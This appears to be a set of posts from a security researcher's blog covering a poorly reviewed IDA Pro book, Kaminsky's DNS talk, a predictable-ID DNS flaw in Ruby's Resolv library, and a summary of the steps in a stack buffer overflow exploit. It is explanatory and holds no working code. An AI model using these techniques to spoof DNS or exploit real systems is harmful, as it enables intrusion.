I ran across this after I finished reading back-to-back reviews by Phn1x and Ilfak Guilfanov of the sounds-like-it’s-excellent “The IDA Pro Book“ by Chris Eagle, from No Starch Press.  Excellent reviews, and the book looks really good.  Please don’t confuse it’s coolness with the lameness I’m about to copy-paste about. I’ll probably wind up buying a copy of Eagle’s book.

The Syngress IDA book, though?  Not so much.

I didn’t know Syngress had an IDA Pro book when I went to Amazon to look at No Starch’s.  There’s a reason for that:  It’s awful.  I can say this, with certainty, without ever having picked it up.  I don’t normally feel this strongly without at least reading the book, but the universally bad reviews of “Reverse Engineering Code with IDA Pro” are quite damning…

…and hilarious :).  Which is why I’m pasting select comments from the various reviews here, as they tickle my funny-bone:

ZT says:

Do we really need half a page to print a table that does nothing but list every possible form a MOV instruction can take?

..and:

For heaven’s sake, the book was published FOUR MONTHS AGO, and already the repository for the book’s source and binaries has disappeared?!  Come on, this is unacceptable. Every time the book dedicates an entire chapter to disassembling a binary, you have to pretty much skip the entire chapter, because the binary isn’t available for you to disassemble. You can’t follow along.

magicmac2000 chimes in with:

And finally, there is information in the index of a chapter, but the pages are not there! It is not a problem of my book, it is a problem of the edition itself!

Hah what?  There’s entire chunks of the book missing:

(Chapter 4) claims to have this items:
Understanding Execution Flow, Tracing Functions, Recovering Hard Coded Password, Finding Vulnerable Functions, Backtracing Execution, Crafting a Buffer Overflow.
The problem is that the editors (Syngress) forgot to include the latest three. Yes, exactly as you hear it: the editors forgot to place those pages on the book.

Even one of the authors, Justin Ferguson, gave it a negative review:

This is my second attempt at reviewing the book I helped write, Amazon continues to censor me probably because my encouragement is not to buy this book (after dealing with syngress, I wouldn’t advise buying anything that comes from them). I don’t know how to say this other than I apologize to everyone who purchased this book, it really was supposed to be much more. However the corporate world being what it is, it was rushed from deadline to deadline without any regard for quality, the editors actually introduced errors, many of the diagrams are unreadable and theres parts of the book just flat out missing. DO NOT BUY.

Ouch!  You can check out the reviews for yourself here.  I think I’ll be getting Chris Eagle’s book instead.

The kind folks who run Black Hat have gone ahead and released the audio and video of Dan Kaminsky’s talk at Black Hat USA 2008, entitled “Black Ops 2008: It’s The End Of The Cache As We Know It”, or “64K Should Be Good Enough For Anyone”.  This is the talk where he discusses the DNS flaw that has been big news lately, and even if you’re already familiar with the details, Kaminsky is a very entertaining speaker.

• Video (.m4v)
• Audio (.mp3)

Thanks to blackhat.com.

Darkoz is a great guy for having maintained the archive of security/hacker conference audio and video at mirrors.easynews.com for several years.  It was a place you could find presentations from just about any conference that had been recorded.  It contained years of talks from Defcon, Blackhat, Shmoocon, HOPE, and more.  I have linked to it several times in the past on my blog, I recommend it to everyone I talk to that’s getting started out in the field, and I have personally used it as a sort of reference/tutorial library for learning various topics.  It was fast, too.  Basically I have nothing but good things to say about it.

The undoing of it, however, is that it is enormous.  For this reason, it has outgrown the hosting kindly provided by easynews, and is in search for a new home.  If you or anyone you know has a redonkulous amount of space available (around 1 terabyte for the entire thing), the bandwidth needed to serve it up, and a desire to help out the security community, please check out Darkoz’s post over on his blog.

If you don’t have the abiility to do that, but you have a blog that you can use to draw some attention Darkoz’s way, please link to him.  The more eyes that hit his request, the better chance he has of finding someone kind enough to host the archive.

This archive is a great resource for the community, and I hope that it’s able to find a new home soon.

Switching the site over to the new theme didn’t go as quickly as I had hoped, but it seems to be working now.  I’ve changed how things are organized too, so it should be easier to find things.  Most of my readers seem to be those interested in the technical guts of security, so I’ve done my best to set the ratio of content to fluff as high as possible.

I was searching for something completely different on Google’s video search and ran across this video of Tom Liston and Sherri Davidoff demonstrating cold-boot memory attacks at CanSecWest.  As I have covered before, they used my msramdmp tool to make an image of RAM:

On the 6th, I posted hashes of a file, “the_dirt.txt”, to titillate my readership while I was busy shopping the information contained within it to TippingPoint and iDefense (in case I had a shot at monetizing it :) ).  Here are the contents of “the_dirt.txt”:

• the_dirt.txt

The idea here is that Ruby implements its own threading model that’s independent of the operating system’s implementation of threads.  While you can have several Ruby threads rolling at once, it’ll all show up as one process to the OS.  A nice effect of this is that Ruby threads can work the same way on multiple operating systems that may not have the same native threading model.

One problem with this, is that if Ruby has to ask the operating system to do something, and that function is blocking (the thread cannot continue until the function returns), all of the Ruby threads run by that process have to wait.  Making an operating system call to do a DNS query will block all of the Ruby threads of a multithreaded application until the result is returned.  This is sub-optimal.  Ruby’s solution in this case is to carry around it’s own DNS resolver (called “Resolv”) that plays nicely with Ruby threads, since it’s written in Ruby itself.  It can even be used as a drop-in replacement for normal DNS resolution simply by doing a “require ‘resolv-replace’”.

The problem with this DNS resolver is that it’s probably the worst you’ve seen since Windows 95 when it comes to random transaction IDs and source ports.  I noticed this when I was working out a bug in my MITM DNS Metasploit module.  Take a look at the TIDs and source ports for the first 8 requests to come out of a test script:

1. TID = 0 , SOURCE = 53571
2. TID = 1 , SOURCE = 53571
3. TID = 2 , SOURCE = 53571
4. TID = 3 , SOURCE = 53571
5. TID = 4 , SOURCE = 53571
6. TID = 5 , SOURCE = 53571
7. TID = 6 , SOURCE = 53571
8. TID = 7 , SOURCE = 53571

Anyone posting a comment pointing out the subtle pattern in these requests gets to become a charter member of the Little Kaminsky Urban Achievers.

Congrats to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira (according to the ruby-lang.org announcement) for beating me to the punch on it :):

• Multiple Vulnerabilities in Ruby (search for “DNS spoofing”)

There’s a patch now, but I’ll bet pentesters will be seeing applications vulnerable to this for quite some time.

…I’d spend a fair amount of time cleaning this inbox:

Thankfully, it’s just a glitch.  Probably something to do with GMail being a little messed up today.

2**32 minus 2, strangely enough :).

Edit: It decrements by 2 each time I click to another folder and then back to Inbox.

These are not words that I often let my own computers tell me (for long).

When it comes to controlling resources, it’s relatively easy to keep people from reading things (access controls, authentication, cryptography, etc).  We’re pretty good at that.  If we own the medium, it’s even fairly easy to keep people from writing things to it.  We can’t, however prevent people from writing to their own media.

So what does this mean?  We have security mechanisms that work (more or less) for reading and writing, but controlling someone’s ability to copy is a Problem.

I ran into this the other day, in OS X’s Preview app, when I tried to copy and paste a quote out of a PDF :

Right.  So, given:

• An environment that I could conceivably control, instrument, or log every aspect of
• A file format that’s typically friendly towards copying text (Highlighted the quote with a text tool, so it’s being represented as glyphs, not images I’d have to OCR or curves I’d have to put back together).
• Permission to read

…there’s no way this kind of protection can work.  If someone has the ability to write to some media, including their own (out of your control!) then giving them read access to some data is tantamount to granting them the ability to copy as well.  Error messages like this are nothing more than polite requests.

I’d have put a tutorial on how to get around this on here, but there’s really just one step:

1. Use Skim.  It’s nicer anyways.

Thanks to HD Moore for this via twitter.  Splunk ad versus linkedin profile found via google:

I can’t stop giggling.

If you’re lucky enough to be in Vegas these next few days for Defcon 16, you really should drop by Immunity’s booth to pick up another certification to put behind your name (apparently free).  The appropriately acronym’d NOP (Network Offense Professional) certification is more than a little tongue-in-cheek, however it’s basic enough to be a good “put up or shut up” for those who claim to have some skills and understanding of basic exploitation.

Here’s the announcement:

Immunity is proud to announce the launch of our new certification, the
Network Offense Professional (NOP) at Defcon. NOP will allow prospective
employers to know that you have the capabilities needed to understand
the complex issues at the heart of information security.

Specifically, to obtain the certification you will need to write a
buffer overflow from scratch within a certain time period. You will
first find the buffer overflow by reverse engineering a target program,
and then obtain a shell from it or execute a command. This is a hands-on
certification, not a paper test. Immunity Debugger, Immunity CANVAS, and
VisualSploit will be available to you during the certification process
to enable you to write the exploit quickly. The target process will be
running on a Windows 2000 SP4 machine.

Successfully completing the challenge will allow you to use the NOP
signifier after your name and will potentially allow you to obtain
discounts of Immunity products.

Taking the NOP certification is on a first come first serve basis. Come
to the Immunity Defcon booth and try your hand.

Any inquiries can be sent to admin_at_immunityinc.com.

Thanks,
Dave Aitel
VP Media Relations
Immunity, Inc.

It’s also meant as a way to show off just how easy Visual Sploit is to use.  I haven’t personally used it, but today, Dave posted a really great flash video demonstrating its use in developing a simple buffer overflow exploit:

• Visual Sploit Demo

Really easy stuff there.  If you understand the concepts of how buffer overflows work, then that video should show you how easy it is to throw an exploit together.  Very clean procedure:

• Demonstrates that the return pointer can be overwritten, by passing a large strings of A’s and seeing 0×41414141 in EIP
• Finds an exact offset for the return pointer by passing a string of AAAABBBBCCCC… and seeing what winds up in EIP
• Since the buffer is sitting at the stack pointer, an exact jump can be made to the shellcode by returning to a “jmp esp” that’s already in memory.
• Drops a “shellcode” of “int 3″ repeated, so the debugger will break and we can see that it worked.

Cool stuff!  Wish I was in Vegas to take the test ;)